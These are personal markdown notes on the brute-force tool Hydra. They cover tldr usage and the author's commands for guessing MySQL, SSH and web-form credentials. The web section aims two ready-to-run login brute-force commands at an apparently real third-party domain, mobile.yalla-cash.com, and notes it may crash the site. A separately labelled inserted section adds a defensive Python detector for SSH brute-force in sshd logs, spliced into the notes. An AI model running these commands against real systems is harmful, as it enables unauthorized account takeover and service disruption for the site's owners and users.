hydra
"/home/yossef/notes/personal/fuckit/hydra.md"
path: personal/fuckit/hydra.md
- **fileName**: hydra
- **Created on**: 2025-06-07 18:47:34
So first, what is hydra? It is a tool used for brute-force attacks on anything.
tldr example:
```
➜ notes git:(main) ✗ tldr hydra
hydra
Online password guessing tool.
Protocols supported include FTP, HTTP(S), SMTP, SNMP, XMPP, SSH, and more.
More information: https://manned.org/hydra.
- Start Hydra's wizard:
hydra-wizard
- Guess SSH credentials using a given username and a list of passwords:
hydra -l username -P path/to/wordlist.txt host_ip ssh
- Guess HTTPS webform credentials using two specific lists of usernames and passwords ("https_post_request" can be like "username=^USER^&password=^PASS^"):
hydra -L path/to/usernames.txt -P path/to/wordlist.txt host_ip https-post-form "url_without_host:https_post_request:login_failed_string"
- Guess FTP credentials using usernames and passwords lists, specifying the number of threads:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -t n_tasks host_ip ftp
- Guess MySQL credentials using a username and a passwords list, exiting when a username/password pair is found:
hydra -l username -P path/to/wordlist.txt -f host_ip mysql
- Guess RDP credentials using a username and a passwords list, showing each attempt:
hydra -l username -P path/to/wordlist.txt -V rdp://host_ip
- Guess IMAP credentials on a range of hosts using a list of colon-separated username/password pairs:
hydra -C path/to/username_password_pairs.txt imap://[host_range_cidr]
- Guess POP3 credentials on a list of hosts using usernames and passwords lists, exiting when a username/password pair is found:
hydra -L path/to/usernames.txt -P path/to/wordlist.txt -M path/to/hosts.txt -F pop3
```
How to use it to hack a MySQL DB or MariaDB or Postgres:
```bash
# for localhost
hydra -L users.txt -P password.txt localhost mysql
# for a new ipconfig and IP
hydra -l <username> -P <password_file> <target_IP> mysql
hydra -L users.txt -P password.txt 192.168.1.7 mysql
```
So to use it, first create two files, one for users and one for passwords.
Then write the command for your specific case, as explained above, passing
the password file and the users file as parameters to the command, and
press Enter.
Using it for SSH ;) -> this sucks, man
```bash
# main command
hydra -L users.txt -P password.txt ssh://192.168.1.100
# ex: hydra -vV -L users.txt -P passwords.txt ssh://192.168.1.100
# for a specific port
hydra -L users.txt -P password.txt ssh://target_IP -s PORT
```
First you must check with nmap whether the SSH port is open or not, then use
the command: type the IP of the target device, make the two files (users and
passwords), and pass them as parameters.
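
From the defender's side, SSH runs like the ones above show up in the target's sshd log as a burst of failed logins from one source across several usernames. The following is an added example, not part of the original notes, that flags this pattern; the log lines are constructed, and the function name, the threshold of 5 failures in 60 seconds and the `year` parameter are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample sshd log lines (not captured from a real system).
SAMPLE_LOG = """\
Jun  7 18:50:01 srv sshd[1201]: Failed password for root from 192.168.1.50 port 40122 ssh2
Jun  7 18:50:01 srv sshd[1202]: Failed password for root from 192.168.1.50 port 40124 ssh2
Jun  7 18:50:02 srv sshd[1203]: Failed password for invalid user admin from 192.168.1.50 port 40126 ssh2
Jun  7 18:50:02 srv sshd[1204]: Failed password for invalid user test from 192.168.1.50 port 40128 ssh2
Jun  7 18:50:03 srv sshd[1205]: Failed password for deploy from 192.168.1.50 port 40130 ssh2
Jun  7 18:50:04 srv sshd[1206]: Accepted password for deploy from 192.168.1.50 port 40132 ssh2
Jun  7 18:52:10 srv sshd[1300]: Failed password for alice from 192.168.1.20 port 51000 ssh2
Jun  7 18:55:40 srv sshd[1301]: Accepted password for alice from 192.168.1.20 port 51002 ssh2
"""

EVENT = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_bruteforce(log_text, year=2025, threshold=5, window_s=60):
    """Flag sources with >= threshold failed logins inside a sliding window.

    Returns {ip: {"users": set of names tried, "compromised": user or None}}.
    Syslog timestamps carry no year, so `year` is supplied by the caller.
    """
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)  # ip -> (timestamp, user) of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        stamp, outcome, user, ip = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        q = recent[ip]
        while q and ts - q[0][0] > window:  # drop failures older than the window
            q.popleft()
        if outcome == "Failed":
            q.append((ts, user))
            if len(q) >= threshold:
                alert = alerts.setdefault(ip, {"users": set(), "compromised": None})
                alert["users"].update(u for _, u in q)
        elif ip in alerts and q:
            # A success right after a flagged burst: treat as a guessed password.
            alerts[ip]["compromised"] = user
    return alerts
```

A source that is flagged and then logs in successfully is the case to respond to first: rotate that account's password and review the session.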
Now the most important use case: using it on the web.
```bash
## --------- hint: maybe this crashes the website, take care -----------
hydra -L users.txt -P password.txt mobile.yalla-cash.com https-post-form \
"/login:license_number=^USER^&password=^PASS^&submit=Login:Invalid login" \
-V -s 443 -f
## second fuck
hydra -L users.txt -P password.txt mobile.yalla-cash.com https-post-form \
"/api/mob/login:phone=^USER^&license_num=^PASS^:Invalid login" \
-s 443 -f
```
In the commands above I use mobile.yalla-cash.com as an example for hacking,
passing the users file and passwords file as parameters, then specifying what
type of request goes to the server (for our example, a POST request), and then
typing the route and the parameters for the request (the input fields of the form on the website).